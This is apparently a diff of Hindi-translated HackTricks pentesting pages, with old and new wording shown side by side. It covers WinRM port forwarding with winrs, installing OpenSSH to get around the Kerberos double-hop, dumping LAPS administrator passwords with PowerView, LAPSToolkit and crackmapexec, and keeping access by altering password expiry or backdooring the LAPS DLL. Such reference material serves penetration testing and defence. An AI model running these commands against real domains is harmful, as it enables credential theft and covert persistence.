netsh advfirewall firewall add rule name=fwd dir=in action=allow protocol=TCP localport=5446 netsh advfirewall firewall add rule name=fwd dir=in action=allow protocol=TCP localport=5446
``` ```
अब सत्र स्थापित करें, जो हमें **पहले सर्वर**े पास आगे भेजेगा। अब सत्र स्थापित करें, जो हमें **पहले सर्वर**ी ओर अग्रेषित करेगा।
<figure><img src="../../.gitbook/assets/image (3) (5) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (3) (5) (1).png" alt=""><figcaption></figcaption></figure>
#### winrs.exe <a href="#winrsexe" id="winrsexe"></a> #### winrs.exe <a href="#winrsexe" id="winrsexe"></a>
**Portforwarding WinRM** अनुरोधों को भी **`winrs.exe`** का उपयोग करके काम करने लगता है। यदि आपको यह ज्ञात है कि PowerShell का अनुगमन किया जा रहा है, तो यह एक बेहतर विकल्प हो सकता है। नीचे दिए गए कमांड में `hostname` के रूप में "secdev" को परिणाम के रूप में लाता है। **Portforwarding WinRM** अनुरोधों को भी लगता है कि यह काम करता है जब **`winrs.exe`** का उपयोग किया जाता है। यदि आपको यह पता है कि PowerShell को मॉनिटर किया जा रहा है, तो यह एक बेहतर विकल्प हो सकता है। नीचे दिए गए कमांड से `hostname` के रूप में “**secdev**” लौटाता है।
```bash ```bash
winrs -r:http://bizintel:5446 -u:ta\redsuit -p:2600leet hostname winrs -r:http://bizintel:5446 -u:ta\redsuit -p:2600leet hostname
``` ```
इसकी तरह, यह आक्रमणकारी सिस्टम कमांड को एक तर्क के रूप में जारी कर सकता है, जैसे `Invoke-Command`। एक सामान्य बैच स्क्रिप्ट उदाहरण _winrm.bat_:
<figure><img src="../../.gitbook/assets/image (2) (6) (2).png" alt=""><figcaption></figcaption></figure>
### OpenSSH <a href="#openssh" id="openssh"></a> ### OpenSSH <a href="#openssh" id="openssh"></a>
इस तरीके के लिए पहले सर्वर बॉक्स पर [OpenSSH इंस्टॉल करना](https://github.com/PowerShell/Win32-OpenSSH/wiki/Install-Win32-OpenSSH) आवश्यक होता है। विंडोज के लिए OpenSSH इंस्टॉल करना **पूरी तरह से CLI के माध्यम से** किया जा सकता है और यह बहुत कम समय लेता है - और यह मैलवेयर के रूप में नहीं फ्लैग होता है! इस तकनीक के लिए [OpenSSH इंस्टॉल करना आवश्यक है](https://github.com/PowerShell/Win32-OpenSSH/wiki/Install-Win32-OpenSSH) पहले सर्वर बॉक्स पर। Windows के लिए OpenSSH इंस्टॉल करना **पूरी तरह से CLI के माध्यम से** किया जा सकता है और यह बहुत कम समय लेता है - और यह मैलवेयर के रूप में फ्लैग नहीं करता!
बेशक कुछ परिस्थितियों में यह संभव नहीं हो सकता है, यह ज्यादा बोझिल हो सकता है या यह एक सामान्य ऑपसेक जोखिम हो सकता है। यह स्थितियों में संभावना है कि यह संभव नहीं हो सकता है, बहुत ज्यादा कठिन हो सकता है या सामान्य OpSec जोखिम हो सकता है।
यह तरीका विशेष रूप से एक जंप बॉक्स सेटअप पर उपयोगी हो सकता है - जहां एक अनुप्रयोगी नेटवर्क तक पहुंच होती है। एक बार SSH कनेक्शन स्थापित हो जाता है, उपयोगकर्ता/आक्रमणकारी अनुरोध के रूप में जितने भी `New-PSSession` की आवश्यकता होती है, उन्हें डबल-हॉप समस्या में धमाका नहीं करना पड़ता है। यह तकनीक एक जंप बॉक्स सेटअप पर विशेष रूप से उपयोगी हो सकती है - जिसमें एक अन्यथा पहुंच योग्य नेटवर्क तक पहुंच हो। एक बार SSH कनेक्शन स्थापित हो जाता है, उपयोगकर्ता/हमलावर डबल-हॉप समस्या में बिना धमाके के सेगमेंटेड नेटवर्क के खिलाफ जितने भी `New-PSSession` की आवश्यकता हो, उन्हें आग लगा सकता है।
OpenSSH में **पासवर्ड प्रमाणीकरण** का उपयोग करने पर (कुंजी या केरबेरोस नहीं), **लॉगऑन प्रकार 8** यानी _नेटवर्क क्लियर पाठ लॉगऑन_ होता है। इसका अर्थ यह नहीं है कि आपका पासवर्ड साफ़ रूप में भेजा जाता है - यह वास्तव में SSH द्वारा एन्क्रिप्ट किया जाता है। आपके सत्र के लिए इसके [प्रमाणीकरण पैकेज](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-logonusera?redirectedfrom=MSDN) के माध्यम से यह स्पष्ट पाठ में अनबन्धित हो जाता है ताकि आपकी सत्र और अधिक ताजगी से भरे गए TGT का अनुरोध कर सकें! जब OpenSSH में **पासवर्ड प्रमाणीकरण** का उपयोग किया जाता है (कुंजियों या कर्बेरोस नहीं), तो **लॉगऑन प्रकार 8** यानी _नेटवर्क क्लियर पाठ लॉगऑन_ होता है। यह यह नहीं मानना चाहिए कि आपका पासवर्ड साफ़ पाठ में भेजा जाता है - यह वास्तव में SSH द्वारा एन्क्रिप्ट किया जाता है। आपके सत्र के लिए यह आगमन के समय अपने [प्रमाणीकरण पैकेज](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-logonusera?redirectedfrom=MSDN) के माध्यम से स्पष्ट पाठ में अनएन्क्रिप्ट हो जाता है ताकि आपका सत्र और अधिक सर्वरों के लिए जूसी TGT का अनुरोध कर सके!
इससे आपको बीचकारी सर्वर को आपकी ओर से TGT का अनुरोध करने और प्राथमिक सर्वर पर स्थानीय रूप से संग्रहीत करने की अनुमति मिलती है। आपकी सत्र इस TGT का उपयोग करके अतिरिक्त सर्वरों के प्रतिद्वंद्वीकरण (PS रिमोट) के लिए प्रमाणित कर सकती है इससे अंतरवर्ती सर्वर आपके पक्ष में एक TGT का अनुरोध कर सकता है और स्थानीय रूप से इसे स्टोर कर सकता है। आपका सत्र फिर इस TGT का उपयोग कर सकता है अधिक सर्वरों के प्रमाणीकरण(PS रिमोट) के लिए
#### OpenSSH इंस्टॉल स्थिति #### OpenSSH इंस्टॉल स्थिति
अपने आक्रमणकारी बॉक्स पर सबसे नवीनतम [OpenSSH रिलीज़ ज़िप फ़ाइल](https://github.com/PowerShell/Win32-OpenSSH/releases) डाउनलोड करें और इसे स्थानांतरित करें (या इसे सीधे जंप बॉक्स पर डाउनलोड करें)। नवीनतम [OpenSSH रिलीज़ ज़िप डाउनलोड करें github से](https://github.com/PowerShell/Win32-OpenSSH/releases) और इसे अपने हमलावर बॉक्स पर ले जाएं और इसे वहाँ ले जाएं (या सीधे जंप बॉक्स पर डाउनलोड करें)।
जहां चाहें वहां ज़िप फ़ाइल को अनबन्ध करें। फिर, इंस्टॉल स्क्रिप्ट - `Install-sshd.ps1` चलाएं जहाँ चाहें वहाँ ज़िप को अनज़िप करें। फिर, इंस्टॉल स्क्रिप्ट चलाएं - `Install-sshd.ps1`
<figure><img src="../../.gitbook/assets/image (2) (1) (3).png" alt=""><figcaption></figcaption></figure> अंततः, बस फायरवॉल नियम जोड़ें **पोर्ट 22 खोलने** के लिए। सुनिश्चित करें कि SSH सेवाएं इंस्टॉल की गई हैं, और उन्हें शुरू करें। ये दोनों सेवाएं SSH काम करने के लिए चालू होनी चाहिए।
अंत में, **पोर्ट 22 खोलने** के लिए एक फ़ायरवॉल नियम जोड़ें। SSH सेवाएं स्थापित होने की पुष्टि करें और उन्हें शुरू करें। इन दोनों सेवाओं को चलाने के लिए SSH की आवश्यकता होगी। यदि आपको `Connection reset` त्रुटि मिलती है, तो अनुमतियाँ अपडेट करें ताकि **सभी: पढ़ें और क्रियान्वित करें** रूट OpenSSH निर्देशिका पर।
<figure><img src="../../.gitbook/assets/image (1) (7).png" alt=""><figcaption></figcaption></figure>
यदि आपको `Connection reset` त्रुटि मिलती है, तो अनुमतियों को अद्यतन करें ताकि **सभी: पढ़ें और क्रियान्वय करें** रूट OpenSSH निर्देशिका पर अनुमति हो।
```bash ```bash
icacls.exe "C:\Users\redsuit\Documents\ssh\OpenSSH-Win64" /grant Everyone:RX /T icacls.exe "C:\Users\redsuit\Documents\ssh\OpenSSH-Win64" /grant Everyone:RX /T
``` ```
@ -143,10 +135,10 @@ icacls.exe "C:\Users\redsuit\Documents\ssh\OpenSSH-Win64" /grant Everyone:RX /T
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापन देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह **The PEASS Family** की खोज करें
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को।** * **हैकिंग ट्रिक्स साझा करें** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को PR जमा करके।**
</details> </details>

View file

@ -4,21 +4,21 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. * **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details> </details>
## मूलभूत जानकारी ## मूल जानकारी
**LAPS** आपको डोमेन-जुडिकेटेड कंप्यूटरों पर स्थानीय व्यवस्थापक पासवर्ड (जो **यादृच्छिक**, अद्वितीय और **नियमित रूप से बदलता है**) का प्रबंधन करने की अनुमति देता है। ये पासवर्ड सेंट्रली Active Directory में संग्रहीत होते हैं और ACL का उपयोग करके अधिकृत उपयोगकर्ताओं को प्रतिबंधित किया जाता है। पासवर्ड क्लाइंट से सर्वर तक Kerberos v5 और AES का उपयोग करके सुरक्षित रूप से यात्रा करते हैं। **LAPS** आपको डोमेन-जुड़े कंप्यूटरों पर **स्थानीय व्यवस्थापक पासवर्ड** (जो **यादृच्छिक**, अद्वितीय, और **नियमित रूप से बदलता है**) प्रबंधित करने की अनुमति देता है। ये पासवर्ड सक्रिय निर्देशिका में केंद्रीय रूप से संग्रहीत होते हैं और एसीएल का उपयोग करके अधिकृत उपयोगकर्ताओं को प्रतिबंधित किया जाता है। पासवर्ड क्लाइंट से सर्वर तक Kerberos v5 और AES का उपयोग करके सुरक्षित रूप से हैं।
LAPS का उपयोग करते समय, डोमेन के **कंप्यूटर** ऑब्जेक्ट्स में **2 नए गुण** दिखाई देते हैं: **`ms-mcs-AdmPwd`** और **`ms-mcs-AdmPwdExpirationTime`**_._ ये गुण प्लेन-टेक्स्ट व्यवस्थापक पासवर्ड और समाप्ति समय को संग्रहीत करते हैं। फिर, डोमेन माहौल में, यह देखना दिलचस्प हो सकता है कि **कौन से उपयोगकर्ता** इन गुणों को पढ़ सकते हैं। LAPS का उपयोग करते समय, डोमेन के **कंप्यूटर** ऑब्जेक्ट्स में **2 नए विशेषताएँ** प्रकट होती हैं: **`ms-mcs-AdmPwd`** और **`ms-mcs-AdmPwdExpirationTime`**। ये विशेषताएँ **सादा-पाठ व्यवस्थापक पासवर्ड और समाप्ति समय** समेत होती हैं। फिर, डोमेन वातावरण में, यह महत्वपूर्ण हो सकता है कि जांचें **कौन-कौन से उपयोगकर्ता** इन विशेषताओं को पढ़ सकते हैं।
### सक्रिय होने की जांच करे ### सक्रिय है या नही
```bash ```bash
reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled
@ -33,9 +33,9 @@ Get-DomainObject -SearchBase "LDAP://DC=sub,DC=domain,DC=local" | ? { $_."ms-mcs
``` ```
### LAPS पासवर्ड एक्सेस ### LAPS पासवर्ड एक्सेस
आप `\\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol` से **LAPS नीति को रॉ डाउनलोड** कर सकते हैं और फिर [**GPRegistryPolicyParser**](https://github.com/PowerShell/GPRegistryPolicyParser) पैकेज **`Parse-PolFile`** का उपयोग करके इस फ़ाइल को मानव-पठनीय स्वरूप में परिवर्तित किया जा सकता है। आप **`\\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol`** से **रॉ LAPS नीति डाउनलोड** कर सकते हैं और फिर [**GPRegistryPolicyParser**](https://github.com/PowerShell/GPRegistryPolicyParser) पैकेज **`Parse-PolFile`** का उपयोग करके इस फ़ाइल को मानव-पठनीय स्वरूप में रूपांतरित किया जा सकता है।
इसके अलावा, यदि हमें पहुंच है तो **नेटिव LAPS PowerShell cmdlets** का उपयोग किया जा सकता है: इसके अतिरिक्त, यदि वे किसी मशीन पर स्थापित हैं जिसका हमारे पास पहुंच है, तो **नेटिव LAPS PowerShell cmdlets** का उपयोग किया जा सकता है:
```powershell ```powershell
Get-Command *AdmPwd* Get-Command *AdmPwd*
@ -56,7 +56,7 @@ Find-AdmPwdExtendedRights -Identity Workstations | fl
# Read the password # Read the password
Get-AdmPwdPassword -ComputerName wkstn-2 | fl Get-AdmPwdPassword -ComputerName wkstn-2 | fl
``` ```
**PowerView** का उपयोग यह भी किया जा सकता है कि पता लगाया जाए कि **कौन पासवर्ड को पढ़ सकता है और उसे पढ़ सकता है**: **PowerView** का उपयोग किया जा सकता है ताकि पता लगा सके **कौन पासवर्ड को पढ़ सकता है और इसे पढ़ सकता है**:
```powershell ```powershell
# Find the principals that have ReadPropery on ms-Mcs-AdmPwd # Find the principals that have ReadPropery on ms-Mcs-AdmPwd
Get-AdmPwdPassword -ComputerName wkstn-2 | fl Get-AdmPwdPassword -ComputerName wkstn-2 | fl
@ -66,9 +66,9 @@ Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwd
``` ```
### LAPSToolkit ### LAPSToolkit
[LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit) लेप्स के जाँच को कई फंक्शनों के साथ सुविधाजनक बनाता है।\ [LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit) एलएपीएस की जांच को कई कार्यों के साथ सुविधाजनक बनाता है।
समें से एक है **`ExtendedRights`** के लिए **लेप्स सक्षम करने वाले सभी कंप्यूटरों का पार्सिंग**। यह दिखाएगा कि कौन से **समूह** विशेष रूप से **लेप्स पासवर्ड पढ़ने के लिए धारित** हैं, जो अक्सर संरक्षित समूहों में उपयोगकर्ता होते हैं।\ नमें से एक है **`ExtendedRights`** का **समापन करना** **लैप्स सक्षम सभी कंप्यूटरों** के लिए। यह दिखाएगा **समूह** विशेष रूप से **लैप्स पासवर्ड पढ़ने के लिए सम्मत किए गए**, जो अक्सर सुरक्षित समूहों में उपयोगकर्ता होते हैं।
एक **खाता** जो एक कंप्यूटर को डोमेन में जोड़ता है, उस होस्ट पर `सभी Extended Rights` प्राप्त करता है, और यह अधिकार खाते को **पासवर्ड पढ़ने** की क्षमता देता है। जाँच में एक उपयोगकर्ता खाता दिखा सकता है जो होस्ट पर लप्स पासवर्ड पढ़ सकता है। यह हमें मदद कर सकता है **निश्चित AD उपयोगकर्ताओं** को लक्ष्य बनाने में जो लेप्स पासवर्ड पढ़ सकते हैं। एक **खाता** जो एक कंप्यूटर को एक डोमेन में शामिल करता है, उस होस्ट पर `सभी विस्तारित अधिकार` प्राप्त करता है, और यह अधिकार **खाते** को **पासवर्ड पढ़ने** की क्षमता देता है। सूचीकरण एक उपयोगकर्ता खाता दिखा सकता है जो होस्ट पर लप्स पासवर्ड पढ़ सकता है। यह हमें मदद कर सकता है **निश्चित एडी उपयोगकर्ताओं** को लक्षित करने में जो लैप्स पासवर्ड पढ़ सकते हैं।
```powershell ```powershell
# Get groups that can read passwords # Get groups that can read passwords
Find-LAPSDelegatedGroups Find-LAPSDelegatedGroups
@ -92,18 +92,16 @@ ComputerName Password Expiration
------------ -------- ---------- ------------ -------- ----------
DC01.DOMAIN_NAME.LOCAL j&gR+A(s976Rf% 12/10/2022 13:24:41 DC01.DOMAIN_NAME.LOCAL j&gR+A(s976Rf% 12/10/2022 13:24:41
``` ```
## **क्रैकमैपेक्सेक के साथ LAPS पासवर्ड्स को डंप करना** ## **Crackmapexec के साथ LAPS पासवर्ड डंपिंग**
यदि पॉवरशेल तक पहुंच नहीं है, तो आप LDAP के माध्यम से इस विशेषाधिकार का दुरुपयोग करके दूरस्थ रूप से इस्तेमाल कर सकते हैं। यदि powershell तक पहुंच नहीं है, तो आप इस विशेषाधिकार का दुरुपयोग LDAP के माध्यम से दूरस्थ रूप से कर सकते हैं।
``` ```
crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps
``` ```
यह उपयोगकर्ता द्वारा पढ़े जा सकने वाले सभी पासवर्ड को डंप करेगा, जिससे आपको एक अलग उपयोगकर्ता के साथ बेहतर फुटहोल्ड मिलेगा।
## **LAPS Persistence** ## **LAPS Persistence**
### **समाप्ति तिथि** ### **समाप्ति तिथि**
एक बार व्यवस्थापक बनने के बाद, आप **पासवर्ड प्राप्त** कर सकते हैं और एक मशीन को **पासवर्ड अपडेट करने से रोक सकते** हैं जब आप **भविष्य में समाप्ति तिथि सेट करते** हैं एक बार एडमिन बनने के बाद, यह संभव है कि आप **पासवर्ड** प्राप्त कर सकें और एक मशीन को **पासवर्ड** अपडेट करने से **रोकने** के लिए **समाप्ति तिथि को भविष्य में** सेट करके
```powershell ```powershell
# Get expiration time # Get expiration time
Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime
@ -113,23 +111,23 @@ Get-DomainObject -Identity computer-21 -Properties ms-mcs-admpwdexpirationtime
Set-DomainObject -Identity wkstn-2 -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"} Set-DomainObject -Identity wkstn-2 -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}
``` ```
{% hint style="warning" %} {% hint style="warning" %}
यदि कोई **एडमिन** **`Reset-AdmPwdPassword`** cmdlet का उपयोग करता है; या यदि LAPS GPO में **नीति द्वारा आवश्यकतानुसार से अधिक समय तक पासवर्ड समाप्ति की अनुमति नहीं है** इंगित करता है, तो पासवर्ड फिर से रीसेट हो जाएगा। अगर **एडमिन** **`Reset-AdmPwdPassword`** cmdlet का उपयोग करता है; या अगर LAPS GPO में **जो नीति द्वारा आवश्यक समय से अधिक पासवर्ड समाप्ति की अनुमति नहीं है** तो पासवर्ड फिर से रीसेट हो जाएगा।
{% endhint %} {% endhint %}
### बैकडोर ### बैकडोर
LAPS के मूल स्रोत कोड [यहाँ](https://github.com/GreyCorbel/admpwd) मिल सकता है, इसलिए कोड में एक बैकडोर डाला जा सकता है (उदाहरण के लिए `Main/AdmPwd.PS/Main.cs` में `Get-AdmPwdPassword` विधि के अंदर) जो किसी तरह से **नए पासवर्डों को निकालेगा या कहीं संग्रहीत करेगा**। LAPS के लिए मूल स्रोत कोड [यहाँ](https://github.com/GreyCorbel/admpwd) पाया जा सकता है, इसलिए कोड में एक बैकडोर डालना संभव है (उदाहरण के लिए `Main/AdmPwd.PS/Main.cs` में `Get-AdmPwdPassword` विधि के अंदर) जो किसी प्रकार से **नए पासवर्डों को बाहर ले जाए या किसी जगह पर संग्रहित करे**।
फिर, नया `AdmPwd.PS.dll` कंपाइल करें और इसे मशीन में `C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dll` पर अपलोड करें (और संशोधन समय बदलें)। फिर, नया `AdmPwd.PS.dll`ो कंपाइल करें और इसे मशीन में `C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dll` में अपलोड करें (और संशोधन समय बदलें)।
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की अनुमति** चाहिए? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **PEASS के नवीनतम संस्करण को देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**। * **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details> </details>

View file

@ -1,28 +1,42 @@
# ओवर पास द हैश/पास द की (PTK) # Over Pass the Hash/Pass the Key
यह हमला **उपयोगकर्ता NTLM हैश या AES कुंजी का उपयोग करके केरबेरोस टिकट का अनुरोध करने** का उद्देश्य रखता है, सामान्यतः NTLM प्रोटोकॉल पर पास द हैश के स्थानांतरण के विकल्प के रूप में। इसलिए, यह विशेष रूप से **उपयोगी हो सकता है जहां NTLM प्रोटोकॉल अक्षम है** और केवल **केरबेरोस को प्रमाणित करने की अनुमति है** <details>
